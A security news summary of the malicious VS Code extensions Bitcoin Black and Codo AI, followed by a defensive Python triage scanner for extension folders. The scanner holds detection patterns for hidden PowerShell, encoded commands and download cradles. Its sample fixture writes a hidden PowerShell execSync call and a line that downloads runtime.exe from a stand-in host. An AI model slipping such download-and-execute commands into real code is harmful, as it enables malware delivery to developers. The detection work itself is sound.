Two malicious extensions on the Visual Studio Code Marketplace, Bitcoin Black and Codo AI, infect developer machines with malware that steals credentials, screenshots and cryptocurrency wallets and hijacks browser sessions. Developers should install extensions only from reputable sources to mitigate these risks. #BitcoinBlack #CodoAI #VSCodeMarketplace
Key points
- The Bitcoin Black and Codo AI extensions were published under the developer name "BigBlack".
- The extensions use PowerShell and batch scripts to download and deploy malicious payloads.
- Both extensions use DLL hijacking to load a malicious DLL, which in turn deploys an infostealer named runtime.exe.
- The malware steals system information, credentials, cookies, and cryptocurrency wallets, and hijacks browser sessions.
- Microsoft and developers alike should stay vigilant, installing extensions only from trusted publishers.
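The behaviour described above (an extension shelling out to PowerShell or batch scripts, downloading a payload, and dropping a DLL beside an EXE) leaves traces on disk that a defender can look for. The following is an added example, written for this page and not code from the reported extensions or from Microsoft: a small Python triage script that walks a VS Code extensions folder and scores each extension on heuristic indicators. The indicator patterns, the scoring weights and the sample extensions it constructs in a temporary directory are all assumptions made here for illustration; they are not the page's indicators of compromise.

```python
import re
import tempfile
from pathlib import Path

# Heuristic indicators of an extension that shells out to PowerShell/cmd or
# stages native binaries. Assumed patterns for this example, not page IoCs.
INDICATORS = {
    "powershell_invocation": re.compile(r"powershell(\.exe)?\s", re.IGNORECASE),
    "hidden_window": re.compile(r"-WindowStyle\s+Hidden|-w\s+hidden", re.IGNORECASE),
    "encoded_command": re.compile(r"-EncodedCommand|-enc\s", re.IGNORECASE),
    "download_cradle": re.compile(r"Invoke-WebRequest|DownloadString|DownloadFile|bitsadmin", re.IGNORECASE),
    "batch_invocation": re.compile(r"cmd(\.exe)?\s+/c|\.bat\b", re.IGNORECASE),
    "child_process": re.compile(r"child_process|execSync|spawnSync", re.IGNORECASE),
}
# File types an extension rarely needs to ship, and text files worth grepping.
BINARY_SUFFIXES = {".dll", ".exe", ".bat", ".cmd", ".ps1"}
TEXT_SUFFIXES = {".js", ".json", ".ts", ".ps1", ".bat", ".cmd"}


def scan_extension(ext_dir):
    """Collect shipped binaries and indicator hits for one extension directory."""
    ext_dir = Path(ext_dir)
    findings = {"binaries": [], "matches": []}
    for path in ext_dir.rglob("*"):
        if not path.is_file():
            continue
        rel = str(path.relative_to(ext_dir))
        suffix = path.suffix.lower()
        if suffix in BINARY_SUFFIXES:
            findings["binaries"].append(rel)
        if suffix in TEXT_SUFFIXES:
            try:
                text = path.read_text(errors="replace")
            except OSError:
                continue
            for name, rx in INDICATORS.items():
                if rx.search(text):
                    findings["matches"].append((rel, name))
    return findings


def risk_score(findings):
    """One point per distinct indicator; a DLL shipped next to an EXE (the
    DLL side-loading layout described on the page) adds two more."""
    score = len({name for _, name in findings["matches"]})
    suffixes = {Path(b).suffix.lower() for b in findings["binaries"]}
    if ".dll" in suffixes and ".exe" in suffixes:
        score += 2
    return score


def scan_extensions_root(root):
    """Scan every extension under a VS Code extensions folder.

    Returns {extension_dir_name: (score, findings)}."""
    results = {}
    for child in sorted(Path(root).iterdir()):
        if child.is_dir():
            findings = scan_extension(child)
            results[child.name] = (risk_score(findings), findings)
    return results


def build_sample_root():
    """Construct a throwaway extensions folder with one benign and one
    suspicious extension. All names and contents are constructed test data."""
    root = Path(tempfile.mkdtemp(prefix="vsix-scan-"))
    benign = root / "publisher.benign-theme-1.0.0"
    benign.mkdir()
    (benign / "package.json").write_text('{"name": "benign-theme", "contributes": {"themes": []}}')
    (benign / "extension.js").write_text("exports.activate = () => console.log('theme loaded');")
    bad = root / "example.suspicious-wallet-0.0.1"  # constructed id, not a real extension
    bad.mkdir()
    (bad / "package.json").write_text('{"name": "suspicious-wallet", "main": "./extension.js"}')
    (bad / "extension.js").write_text(
        "const { execSync } = require('child_process');\n"
        "exports.activate = () => execSync('powershell.exe -WindowStyle Hidden -File setup.ps1');\n"
    )
    (bad / "setup.ps1").write_text("Invoke-WebRequest -Uri http://example.invalid/p -OutFile runtime.exe\n")
    (bad / "runtime.exe").write_bytes(b"MZ")   # placeholder stub, not a real binary
    (bad / "version.dll").write_bytes(b"MZ")   # DLL beside the EXE: side-loading layout
    return root


if __name__ == "__main__":
    # Point this at ~/.vscode/extensions on a real machine; here we use the sample.
    for name, (score, findings) in scan_extensions_root(build_sample_root()).items():
        print(f"{name}: score={score} binaries={findings['binaries']}")
        for rel, indicator in findings["matches"]:
            print(f"    {rel}: {indicator}")
```

The score is a triage aid, not a verdict: legitimate extensions occasionally bundle a helper binary or use `child_process` for a language server, so anything scoring above zero deserves a look at the actual commands being run rather than automatic removal.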